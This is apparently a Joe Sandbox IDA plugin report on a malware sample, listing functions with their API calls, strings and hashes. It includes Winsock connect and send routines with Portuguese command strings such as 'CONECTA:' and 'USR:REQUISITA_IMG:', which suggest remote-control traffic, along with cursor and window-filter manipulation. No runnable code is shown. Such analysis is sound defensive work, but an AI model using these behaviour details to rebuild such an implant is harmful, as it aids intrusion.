free.LIBCMT ref: 00007FF6B40A691C
free.LIBCMT ref: 00007FF6B40A6925
free.LIBCMT ref: 00007FF6B40A692E
free.LIBCMT ref: 00007FF6B40A6937
free.LIBCMT ref: 00007FF6B40A6943
free.LIBCMT ref: 00007FF6B40A694F
free.LIBCMT ref: 00007FF6B40A695B
free.LIBCMT ref: 00007FF6B40A6967
free.LIBCMT ref: 00007FF6B40A6973
free.LIBCMT ref: 00007FF6B40A697F
free.LIBCMT ref: 00007FF6B40A698B
free.LIBCMT ref: 00007FF6B40A6997
free.LIBCMT ref: 00007FF6B40A69A3
free.LIBCMT ref: 00007FF6B40A69AF
free.LIBCMT ref: 00007FF6B40A69BB
free.LIBCMT ref: 00007FF6B40A69C7
free.LIBCMT ref: 00007FF6B40A69D3
free.LIBCMT ref: 00007FF6B40A69DF
free.LIBCMT ref: 00007FF6B40A69EB
free.LIBCMT ref: 00007FF6B40A69F7
free.LIBCMT ref: 00007FF6B40A6A03
free.LIBCMT ref: 00007FF6B40A6A0F
free.LIBCMT ref: 00007FF6B40A6A1B
free.LIBCMT ref: 00007FF6B40A6A27
free.LIBCMT ref: 00007FF6B40A6A33
free.LIBCMT ref: 00007FF6B40A6A3F
free.LIBCMT ref: 00007FF6B40A6A4B
free.LIBCMT ref: 00007FF6B40A6A57
free.LIBCMT ref: 00007FF6B40A6A63
free.LIBCMT ref: 00007FF6B40A6A6F
free.LIBCMT ref: 00007FF6B40A6A7B

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: 0b71429deb81e7807e75a2bd1a0a42655bb2174fbb638932e50c779c8f02acd2
Instruction ID: d3983c027c6f3bcdb5129cfb1a8db50286fe81d4c6333b50dfe83e33b692828c
Opcode Fuzzy Hash: 0b71429deb81e7807e75a2bd1a0a42655bb2174fbb638932e50c779c8f02acd2
Instruction Fuzzy Hash: 36419522A1544381EA44BFB9CCE62BC1320EFE5F44F454935EB4DEB3A7CE18D8858352

Function 000000018000DFE0 Relevance: 37.2, APIs: 16, Strings: 5, Instructions: 420networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32 ref: 000000018000E081
WSACleanup.WS2_32 ref: 000000018000E0A3
htons.WS2_32 ref: 000000018000E0BF
socket.WS2_32 ref: 000000018000E0EB
connect.WS2_32 ref: 000000018000E0FF
socket.WS2_32 ref: 000000018000E1B0
connect.WS2_32 ref: 000000018000E1C6
closesocket.WS2_32 ref: 000000018000E133

Part of subcall function 0000000180035E68: QueryPerformanceFrequency.KERNEL32(?,?,?,?,0000000180021955), ref: 0000000180035E7D

Part of subcall function 0000000180035E4C: QueryPerformanceCounter.KERNEL32(?,?,?,?,000000018002195D), ref: 0000000180035E55

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000E69B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000E6A1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000E6A7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000E6AD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000E6B3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000E6B9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000E6BF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000E6C5

Strings

- , xrefs: 000000018000E29F
/ , xrefs: 000000018000E3C5
Erro ao resolver o DNS., xrefs: 000000018000E08F
25-11 C1, xrefs: 000000018000E2D9
CONECTA:, xrefs: 000000018000E260

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$PerformanceQueryconnectsocket$CleanupCounterFrequencyclosesocketgethostbynamehtons
String ID: - $ / $25-11 C1$CONECTA:$Erro ao resolver o DNS.
API String ID: 2310369716-2918550630
Opcode ID: 52d5240bcedf4e9b4abb98dfb1ebef776c67780c738b503b5ded241c8cdddbb4
Instruction ID: 9993179b595ba36418cc91432636fe815c6da2263fb383282271c0018b348804
Opcode Fuzzy Hash: 52d5240bcedf4e9b4abb98dfb1ebef776c67780c738b503b5ded241c8cdddbb4
Instruction Fuzzy Hash: 7312A032604B8885FB52CB64E8843DD3761F7997E8F519214EA9927BE6DF78C2C8D340

Function 00007FF6B40A7698 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 130libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A76D5
GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A76F1
GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A7719
EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A7722
GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A7738
EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A7741
GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A7757
EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A7760
GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A777E
EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A7787
DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A77B9
DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A77C8
DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A7820
DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A7840
DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF6B40A3E3C,?,?,?,?,?,00007FF6B40A3ED0), ref: 00007FF6B40A7859

Strings

USER32.DLL, xrefs: 00007FF6B40A76CE
GetLastActivePopup, xrefs: 00007FF6B40A7727
GetActiveWindow, xrefs: 00007FF6B40A7708
GetProcessWindowStation, xrefs: 00007FF6B40A7774
GetUserObjectInformationA, xrefs: 00007FF6B40A7746
MessageBoxA, xrefs: 00007FF6B40A76E7

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3085332118-232180764
Opcode ID: e7ea040aab6b8ef53243cf747697d564229f4ccfd9ec1d678ccb095a88fbf4a7
Instruction ID: 44e36cab63391490060f984d7414d32caf44983a47db5b4076a06455b2cf216f
Opcode Fuzzy Hash: e7ea040aab6b8ef53243cf747697d564229f4ccfd9ec1d678ccb095a88fbf4a7
Instruction Fuzzy Hash: 4251F821A0AB4340FE55EF5AA8C467963A16F88BC0F544539DF9DC77A1EE3CE4868205

Function 000000018004F780 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000018004F79B
try_get_function.LIBVCRUNTIME ref: 000000018004F7BA

Part of subcall function 000000018004EDF8: GetProcAddress.KERNEL32(?,?,00000009,000000018004F326,?,?,8000000000000000,000000018004B616,?,?,8000000000000000,0000000180041701), ref: 000000018004EF50

try_get_function.LIBVCRUNTIME ref: 000000018004F7D9

Part of subcall function 000000018004EDF8: LoadLibraryExW.KERNEL32(?,?,00000009,000000018004F326,?,?,8000000000000000,000000018004B616,?,?,8000000000000000,0000000180041701), ref: 000000018004EE9B
Part of subcall function 000000018004EDF8: GetLastError.KERNEL32(?,?,00000009,000000018004F326,?,?,8000000000000000,000000018004B616,?,?,8000000000000000,0000000180041701), ref: 000000018004EEA9
Part of subcall function 000000018004EDF8: LoadLibraryExW.KERNEL32(?,?,00000009,000000018004F326,?,?,8000000000000000,000000018004B616,?,?,8000000000000000,0000000180041701), ref: 000000018004EEEB

try_get_function.LIBVCRUNTIME ref: 000000018004F7F8

Part of subcall function 000000018004EDF8: FreeLibrary.KERNEL32(?,?,00000009,000000018004F326,?,?,8000000000000000,000000018004B616,?,?,8000000000000000,0000000180041701), ref: 000000018004EF24

try_get_function.LIBVCRUNTIME ref: 000000018004F817
try_get_function.LIBVCRUNTIME ref: 000000018004F836
try_get_function.LIBVCRUNTIME ref: 000000018004F855
try_get_function.LIBVCRUNTIME ref: 000000018004F874
try_get_function.LIBVCRUNTIME ref: 000000018004F893
try_get_function.LIBVCRUNTIME ref: 000000018004F8B2

Strings

GetLocaleInfoEx, xrefs: 000000018004F810
LocaleNameToLCID, xrefs: 000000018004F8B7, 000000018004F8CA
AreFileApisANSI, xrefs: 000000018004F794
CompareStringEx, xrefs: 000000018004F7B3
GetTimeFormatEx, xrefs: 000000018004F81C, 000000018004F82F
IsValidLocaleName, xrefs: 000000018004F85A, 000000018004F86D
GetDateFormatEx, xrefs: 000000018004F7DE, 000000018004F7F1
EnumSystemLocalesEx, xrefs: 000000018004F7BF, 000000018004F7D2
LCIDToLocaleName, xrefs: 000000018004F898, 000000018004F8AB
LCMapStringEx, xrefs: 000000018004F88C
GetUserDefaultLocaleName, xrefs: 000000018004F83B, 000000018004F84E

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
API String ID: 3255926029-3252031757
Opcode ID: c039f8bee14662dce6996a399a0491f711c1b94d5491e1b9cbaf09e8a8d219fb
Instruction ID: 86e4c2fd064b3298e5a683158b9464dc3b9c67319004aeacb9cdb2195a29d970
Opcode Fuzzy Hash: c039f8bee14662dce6996a399a0491f711c1b94d5491e1b9cbaf09e8a8d219fb
Instruction Fuzzy Hash: 40316FB4600E8EE1F6C6DB54E8517D52322B74D3C8FE1D627B21A921A19E3E878EC741

Function 00000001800129F0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 212fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32 ref: 0000000180012B65
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131C0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131C6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131DE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131E4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800131FC

Strings

_2.ini, xrefs: 0000000180012B0F, 0000000180012DA6

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$DeleteFile
String ID: _2.ini
API String ID: 1114300416-1593853712
Opcode ID: e2f0e5589e1054eaed38bc1b03e7da1718d4d32ff3b1cd3e1682fe779ec26469
Instruction ID: ba976bcf0cce0000d455ca6d3a3e32d3e02cb9071f4f5d32dfad8d5ec15edbbc
Opcode Fuzzy Hash: e2f0e5589e1054eaed38bc1b03e7da1718d4d32ff3b1cd3e1682fe779ec26469
Instruction Fuzzy Hash: 56A19A32614F8986F742DF64E8843DD77A1F799388F508504FA8813AAADF78D389D780

Function 0000000180022E90 Relevance: 24.1, APIs: 16, Instructions: 107windowsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180022CE0: LoadImageA.USER32 ref: 0000000180022DB0
Part of subcall function 0000000180022CE0: SetSystemCursor.USER32 ref: 0000000180022DBB

Part of subcall function 0000000180022CE0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180022E18
Part of subcall function 0000000180022CE0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180022E1E
Part of subcall function 0000000180022CE0: SendMessageW.USER32 ref: 0000000180022E71
Part of subcall function 0000000180022CE0: Sleep.KERNEL32 ref: 0000000180022E7C

IsWindowVisible.USER32 ref: 0000000180022F28
ShowWindow.USER32 ref: 0000000180022F3C
Sleep.KERNEL32 ref: 0000000180022F4E
MagSetWindowFilterList.MAGNIFICATION ref: 0000000180022F7B
GetWindowLongW.USER32 ref: 0000000180022F8D
SetWindowLongW.USER32 ref: 0000000180022FA7
GetWindowLongW.USER32 ref: 0000000180022FB9
SetWindowLongW.USER32 ref: 0000000180022FD2
UpdateWindow.USER32 ref: 0000000180022FDF
SendMessageW.USER32 ref: 0000000180022FFB
GetWindowRect.USER32 ref: 0000000180023014
InvalidateRect.USER32 ref: 0000000180023030
UpdateWindow.USER32 ref: 000000018002303D
GetWindowRect.USER32 ref: 000000018002304F
InvalidateRect.USER32 ref: 0000000180023069
UpdateWindow.USER32 ref: 0000000180023076

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Window$LongRect$Update$InvalidateMessageSendSleep_invalid_parameter_noinfo_noreturn$CursorFilterImageListLoadShowSystemVisible
String ID:
API String ID: 2118151185-0
Opcode ID: c421837eef5cf0c859e95d939141ad8f3c803b8f0718189f3e6ee143eb65d7c3
Instruction ID: 090e2e4387ff827606197f0edb04bdad214cfcd5618343c24430e7b43fee47d7
Opcode Fuzzy Hash: c421837eef5cf0c859e95d939141ad8f3c803b8f0718189f3e6ee143eb65d7c3
Instruction Fuzzy Hash: B9511D35204A0986F7979B61EC553E92322FB8DBD0F158026B92A4B7E6DE3CC74C8752

Function 0000000180036360 Relevance: 22.7, APIs: 15, Instructions: 205COMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180004978), ref: 00000001800363F9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180004978), ref: 0000000180036403
__std_fs_open_handle.LIBCPMT ref: 000000018003645F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180004978), ref: 0000000180036474
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180004978), ref: 00000001800365D0

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CloseHandle$AttributesErrorFileLast__std_fs_open_handle
String ID:
API String ID: 1051874144-0
Opcode ID: d7d9ad898ca5c736dd7fde48f784ae9ffbed1d2b8b8e67e3cdbec13a7f168e05
Instruction ID: 7fe87dfe07bae9c02167d3d331dfdaf8d8683995787a5e02385678a31289e04d
Opcode Fuzzy Hash: d7d9ad898ca5c736dd7fde48f784ae9ffbed1d2b8b8e67e3cdbec13a7f168e05
Instruction Fuzzy Hash: 81818432B00A0846FBE78B69E8057DA63A1AB597F4F19C324BD754B6E4DF34C7498300

Function 0000000180038BD0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000000180038BE6
GetModuleHandleW.KERNEL32 ref: 0000000180038BF3
GetModuleHandleW.KERNEL32 ref: 0000000180038C08
GetProcAddress.KERNEL32 ref: 0000000180038C20
GetProcAddress.KERNEL32 ref: 0000000180038C33
CreateEventW.KERNEL32 ref: 0000000180038C5F
DeleteCriticalSection.KERNEL32 ref: 0000000180038CAB
CloseHandle.KERNEL32 ref: 0000000180038CBD

Strings

kernel32.dll, xrefs: 0000000180038C01
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0000000180038BEC
SleepConditionVariableCS, xrefs: 0000000180038C16
WakeAllConditionVariable, xrefs: 0000000180038C26

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: f469fb8150ac8d6593ad5a993452ea837a0d11174a266939cad0273b475fc224
Instruction ID: 79d2a9551a4cba249b4df55cd25fe0a91a1f52a30efec84917d29f1bfb722e0f
Opcode Fuzzy Hash: f469fb8150ac8d6593ad5a993452ea837a0d11174a266939cad0273b475fc224
Instruction Fuzzy Hash: C9213931316B0881FA979B20EC943E623A1BB4DBC0F959465B92E467A5EF38C74CD710

Function 00000001800088AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 227networksleepCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 000000018000898C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008A55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008A5B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008A67
send.WS2_32 ref: 0000000180008B9F
Sleep.KERNEL32 ref: 0000000180008BB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008C85
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008C8B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180008C97

Strings

USR:, xrefs: 00000001800088CC
USR:REQUISITA_IMG:, xrefs: 0000000180008ADB

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$send$Sleep
String ID: USR:$USR:REQUISITA_IMG:
API String ID: 1953683909-2585335516
Opcode ID: 0089d5bd452393b84b9194c064b31c3548e370974a749a4f9c65415efd57f7c5
Instruction ID: d4f1d61b9b0993d807a40c7d7e4dea851ed4bc94abf62031dd5bf2b1d1f090e6
Opcode Fuzzy Hash: 0089d5bd452393b84b9194c064b31c3548e370974a749a4f9c65415efd57f7c5
Instruction Fuzzy Hash: A9A17072614B8881FB55DB28E4443DE73A1FB897D4F508601E7EC07AEADF78C2899700

Function 00007FF6B40A3028 Relevance: 18.1, APIs: 12, Instructions: 82COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF6B40A3047

Part of subcall function 00007FF6B40A2198: HeapFree.KERNEL32(?,?,00000000,00007FF6B40A2FEC,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A21AE
Part of subcall function 00007FF6B40A2198: _errno.LIBCMT ref: 00007FF6B40A21B8
Part of subcall function 00007FF6B40A2198: GetLastError.KERNEL32(?,?,00000000,00007FF6B40A2FEC,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A21C0

free.LIBCMT ref: 00007FF6B40A3055
free.LIBCMT ref: 00007FF6B40A3063
free.LIBCMT ref: 00007FF6B40A3071
free.LIBCMT ref: 00007FF6B40A307F
free.LIBCMT ref: 00007FF6B40A308D
free.LIBCMT ref: 00007FF6B40A309E
free.LIBCMT ref: 00007FF6B40A30B6
_lock.LIBCMT ref: 00007FF6B40A30C0
free.LIBCMT ref: 00007FF6B40A30EE
_lock.LIBCMT ref: 00007FF6B40A3103
free.LIBCMT ref: 00007FF6B40A314D

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: free$_lock$ErrorFreeHeapLast_errno
String ID:
API String ID: 1575098132-0
Opcode ID: 1b549e4b2bbbda140a981fcaf19588171488f7cd6ae1c41e55384d5307f6e92b
Instruction ID: ed5c03e9143867c2d591de9585f96c0fbc1fe55fa1529b581c84374e919bff5f
Opcode Fuzzy Hash: 1b549e4b2bbbda140a981fcaf19588171488f7cd6ae1c41e55384d5307f6e92b
Instruction Fuzzy Hash: 7631F821B0A50385FE58AFADD4E57786351AFD1B40F490539DB0E977C6CE2CE8418352

Function 0000000180027C30 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000180027CFB
std::_Lockit::_Lockit.LIBCPMT ref: 0000000180027D26
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000180027D53
std::_Facet_Register.LIBCPMT ref: 0000000180027DD2
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000180027DEF

Strings

ios_base::failbit set, xrefs: 0000000180027F1F
ios_base::eofbit set, xrefs: 0000000180027F26
ios_base::badbit set, xrefs: 0000000180027F13

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 459529453-1866435925
Opcode ID: c9a0a170f115a1d3dfb74d4519ddb3446fc27532f59128dfa460f7f8460fa0fa
Instruction ID: 39072443c0a6b95e6e8ce1bed6c9d1b8f02edad6c6fd69cf92bb3f7657e7f48c
Opcode Fuzzy Hash: c9a0a170f115a1d3dfb74d4519ddb3446fc27532f59128dfa460f7f8460fa0fa
Instruction Fuzzy Hash: 9AA15A32305B8885EBA7CB15E4803EA77A1FB89BD4F558116EA4D437A6DF38CA49C740

Function 0000000180020750 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00000001800207C6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000000180020812
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000180020957
Concurrency::cancel_current_task.LIBCPMT ref: 0000000180020970
Concurrency::cancel_current_task.LIBCPMT ref: 0000000180020983
